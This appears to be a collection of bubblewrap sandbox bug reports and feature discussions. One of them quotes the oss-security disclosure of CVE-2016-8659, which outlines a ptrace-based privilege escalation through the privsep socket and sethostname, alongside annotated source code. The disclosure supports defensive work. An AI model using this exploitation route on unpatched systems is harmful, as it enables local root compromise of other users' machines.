I would like to point out that identifiers like "__MOUNTS_H__" and "__NETWORK_H__" do not fit to the expected naming convention of the C++ language standard.
Would you like to adjust your selection for unique names?

bash completion errors when using sudo

While testing https://bodhi.fedoraproject.org/updates/bubblewrap-0.1.4-5.fc25 on a F25 Vagrant box, I observed the following (the /dev/null issue is #125):

$ rpm -q bubblewrap
bubblewrap-0.1.4-5.fc25.x86_64
[vagrant@localhost ~]$ whoami
vagrant
[vagrant@localhost ~]$ bwrap --ro-bind / / bash
bash: /dev/null: Permission denied
bash: /dev/null: Permission denied
bash: /dev/null: Permission denied
bash: /dev/null: Permission denied
bash: /dev/null: Permission denied
bash: /dev/null: Permission denied
bash: /dev/null: Permission denied
bash: /dev/null: Permission denied
bash: /dev/null: Permission denied
bash: /dev/null: Permission denied
bash: /dev/null: Permission denied
bash: /dev/null: Permission denied
bash: /dev/null: Permission denied
bash: /dev/null: Permission denied
bash: /dev/null: Permission denied
bash: /dev/null: Permission denied
bash: /dev/null: Permission denied
$ sudo jou<tab key pressed>
bash: /dev/null: Permission denied
bash: /dev/null: Permission denied
bash: /dev/null: Permission denied
bash: _upvars: `-a2': invalid number specifier
bash: /dev/null: Permission denied
bash: _upvars: `-a0': invalid number specifier

I'm admittedly just mashing keys and probably not using bwrap as intended, but figured I would file this anyways.

--share-user default even without userns

Basically I built on RHEL7.2, tried to run the demo, but needed:

diff --git a/demos/bubblewrap-shell.sh b/demos/bubblewrap-shell.sh
index da06d49..a445660 100755
--- a/demos/bubblewrap-shell.sh
+++ b/demos/bubblewrap-shell.sh
@@ -5,6 +5,7 @@ set -euo pipefail
       --dir /tmp \
       --proc /proc \
       --dev /dev \
+      --share-user \
       --ro-bind /etc/resolv.conf /etc/resolv.conf \
       --symlink usr/lib /lib \
       --symlink usr/lib64 /lib64 \

I'm leaning a bit towards making --share-user the default, and you always have to say --unshare-user if you want that ?

Maybe we have a --unshare-user-if-possible ? Dunno.

If we don't have a DWIM in bwrap, the ergonomics are going to be annoying for consuming tools that want to support both modes.

Race conditions

There has just been a local root exploit on firejail using a race condition
netblue30/firejail#1020

I have not yet been able to reproduce this with bubblewrap but I have the feeling simular issues could affect bubblewrap as well.

Comparing how the two programms do things, it there any major difference that rules these kind of issues on bubblewrap?

Mounting /dev/pts fails if no /proc

This command fails:

$ bwrap --unshare-pid --ro-bind / / --dev /dev  sh
Can't mount devpts on /newroot/dev/pts: Invalid argument

While this works:

$ bwrap --unshare-pid --ro-bind / / --dev /dev --proc /proc sh
sh-4.3$

No idea why...

Maybe provide more sandbox examples

Just an idea, but people might find it interesting to use bwrap instead of firejail. Here is a quick example to contain Skype and even use Xephyr instead of the current X session.

#!/bin/sh
Xephyr :9 -screen 600x700 -reset -terminate -host-cursor -ac 2> /dev/null &
sleep 3
DISPLAY=:9 metacity 2> /dev/null &
mkdir /tmp/skypepulseclientconf
echo "enable-shm = no" > /tmp/skypepulseclientconf/client.conf
bwrap --ro-bind / / --tmpfs /home --bind /home/$USER/.Skype /home/$USER/.Skype --bind /home/$USER/.config/Skype /home/$USER/.config/Skype  --tmpfs /tmp --proc /proc --dev /dev --mqueue /dev/mqueue --chdir /home/$USER --unshare-pid --tmpfs /run --ro-bind /run/user/$(id -u) /run/user/$(id -u) --bind /tmp/skypepulseclientconf /home/$USER/.config/pulse --unshare-cgroup-try --setenv DISPLAY ":9" --tmpfs /run/user/$(id -u)/gdm skype
# using bwrap to make all read-only, make pulse work through new client.conf, hide home content except for skype dirs which are writable, new empty tmp, dev and proc, own pid namespace
# optionally use xephyr as display 9 and hide xauth cookie through tmpfs for /run/user/<id>/gdm

move _LD_LIBRARY_PATH special casing out to --setenv

We could require the caller to call setenv() early on in their code, but it would seem more general to just expose e.g.:

bubblewrap --setenv LD_LIBRARY_PATH "$(LD_LIBRARY_PATH)"

README: citation needed

These tools are not suitable to give to unprivileged users, because it is trivial to turn such access into to a fully privileged root shell on the host.

Broad claim. I don't see any evidence here.

delegated netns access

While we allow the creation of a new netns, we don't allow configuring it, so our current support is "host network" or "none".

It would be quite interesting to allow root to delegate access to pre-configured network namespaces to bubblewrap users. This could be something like having an extended attribute or ACL on /proc/$pid/ns/net ? (If /proc supported xattrs which it doesn't). So maybe we define this as having a /run/bwrap/netns/$netnsname symlink, and admins which want to grant access to a netns just do:

mkdir /run/bwrap/netns/no-vpn
ln -s /proc/$netnspid/ns/net /run/bwrap/netns/no-vpn/net
setfacl -m u:someuser:rx /run/bwrap/netns/no-vpn

And then a user could do:

bwrap --netns no-vpn

And we would try to readlink to see whether we could call setns ?

privilege escalation via ptrace (CVE-2016-8659)

Sebastian Krahmer reported this to the oss-security mailing list.

There is a beautiful, easy to exploit, logical bug within the
bubblewrap program, thats part of the flatpak container-app framework,
but also used with other container solutions.

/usr/bin/bwrap may be installed mode 04755 or with cap_sys_admin and other
file caps. I dont know if there are any dists already shipping it that way,
but the Makefile and some RedHat spec files contain file caps for it.

bubblewrap's aim is to setup a container and seccomp sandbox for programs to be run
as user.

For some reason it sets the PR_SET_DUMPABLE flag, as seen below. The comment about
it looks strange to me. If thats really true, suid programs shouldn't
be forced to play with the dumpable flag to achieve their goal.

Once the dumpable flag is set, there is a chance we could attach to the process,
once the remaining caps are dropped and the whole process runs as user.

Luckily, that happens at line 1707, right after a PrivSep socket has been opened!

Once attached to the (now running as unprived user) process, we can inject
commands into that socket. We could do arbitrary mounts, but won't achieve much, since
the bwrap process is running in its own mount namespace. However, there is
a sethostname() OP, that we can use to affect the hostname of the entire system
(not restricted to UTS namespace). Now, just wait for root or other users to
login and execute bash to use one of the PS expansion bugs to execute code.

(I wonder that has been re-discovered recently, it was already part of the
CVE-2011-0966 attack vector.)


 383 acquire_caps (void)
 384 {

[...]

 422   /* We need the process to be dumpable, or we can't access /proc/self/uid_map */
 423   if (prctl (PR_SET_DUMPABLE, 1, 0, 0, 0) < 0)
 424     die_with_error ("prctl(PR_SET_DUMPABLE) failed");
 425 }


[...]


1422 int
1423 main (int    argc,
1424       char **argv)
1425 {

[...]

1440   /* Get the (optional) capabilities we need, drop root */
1441   acquire_caps ();

[...]

1692   if (is_privileged)
1693     {
1694       pid_t child;
1695       int privsep_sockets[2];
1696
1697       if (socketpair (AF_UNIX, SOCK_SEQPACKET | SOCK_CLOEXEC, 0, privsep_sockets) != 0)
1698         die_with_error ("Can't create privsep socket");
1699
1700       child = fork ();
1701       if (child == -1)
1702         die_with_error ("Can't fork unprivileged helper");
1703
1704       if (child == 0)
1705         {
1706           /* Unprivileged setup process */
1707           drop_caps ();                                                            // BOOM
1708           close (privsep_sockets[0]);
1709           setup_newroot (opt_unshare_pid, privsep_sockets[1]);
1710           exit (0);
1711         }
1712       else
1713         {
1714           uint32_t buffer[2048];  /* 8k, but is int32 to guarantee nice alignment */
1715           uint32_t op, flags;
1716           const char *arg1, *arg2;
1717           cleanup_fd int unpriv_socket = -1;
1718
1719           unpriv_socket = privsep_sockets[0];
1720           close (privsep_sockets[1]);
1721
1722           do
1723             {
1724               op = read_priv_sec_op (unpriv_socket, buffer, sizeof (buffer),
1725                                      &flags, &arg1, &arg2);
1726               privileged_op (-1, op, flags, arg1, arg2);
1727               if (write (unpriv_socket, buffer, 1) != 1)
1728                 die ("Can't write to op_socket");
1729             }
1730           while (op != PRIV_SEP_OP_DONE);
1731
1732           /* Continue post setup */
1733         }
1734     }

Recursive remount not handling shadowing

If you do a recursive remount (for instance to readonly) we don't properly handle mounts covering other mounts. For instance, if we have mounts in this order: /foo /foo/bar /foo, then the last one covers the other two, but we will try to remount the first two, probably failing due to the wrong permissions.

To properly handle this we need to parse the mount id and parent id in /proc/*/mountinfo and ordering into account.

README.md: create

Let's describe the rationale for this.